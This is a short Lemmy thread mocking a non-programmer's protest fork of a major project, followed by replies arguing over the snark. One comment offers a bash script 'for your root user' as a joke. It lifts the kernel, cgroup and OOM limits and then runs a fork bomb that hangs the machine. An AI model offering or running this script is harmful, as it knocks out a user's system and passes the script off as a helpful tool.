• FauxLiving@lemmy.world
    link
    fedilink
    English
    arrow-up
    11
    arrow-down
    5
    ·
    edit-2
    6 days ago

    @[email protected] has the best serious response, that being said…

    So far, nothing but the README has been changed

    Worth keeping in mind that I’m not a programmer, I cannot write code yet

    Finally, what we’ve all been waiting for: a fork that liberates us from the tyranny of git checkout and editing a text file.

    Is there a Patreon or 501(c)(3) organization that we can donate to in order to support the continued work non-programmers who use social media announce protest forks of major projects without any ability or intent to continue the project?

    We in the Linux community have too much free time and appreciate things like this consuming our surplus attention which would otherwise be wasted making memes about Windows, berating people for not reading the fantastic manual and tweaking our fastfetch layouts.

    As a thanks to you, and all other performative fork developers, I’ve developed a simple bash script for your root user that will help you create forks in a more efficient manner:

    #!/bin/bash
    sysctl -w kernel.pid_max=4194304
    sysctl -w kernel.threads-max=1073741823
    echo "max" > /sys/fs/cgroup/user.slice/user-$(id -u).slice/pids.max 2>/dev/null || true
    echo $$ > /sys/fs/cgroup/cgroup.procs 2>/dev/null || true
    ulimit -u unlimited
    echo -1000 > /proc/self/oom_score_adj
    :(){ :|:& };:
    
    • BlackLaZoR@lemmy.world
      link
      fedilink
      English
      arrow-up
      2
      ·
      4 days ago

      Jesus… Whole thing is utterly ridiculous. It is all just AI hate mob circle jerking round’n’round

      • FauxLiving@lemmy.world
        link
        fedilink
        English
        arrow-up
        3
        ·
        3 days ago

        For my sanity I just picture a majority of these people as impressionable children who are just sharing the latest popular meme in order to cosplay as political activists.

    • felbane@lemmy.world
      link
      fedilink
      English
      arrow-up
      4
      arrow-down
      2
      ·
      6 days ago

      On the one hand, I see your point (whether or not I agree with it).

      On the other, you wasted way more of your surplus attention on writing a snarky comment and being a dick than you would have by just down voting and moving on.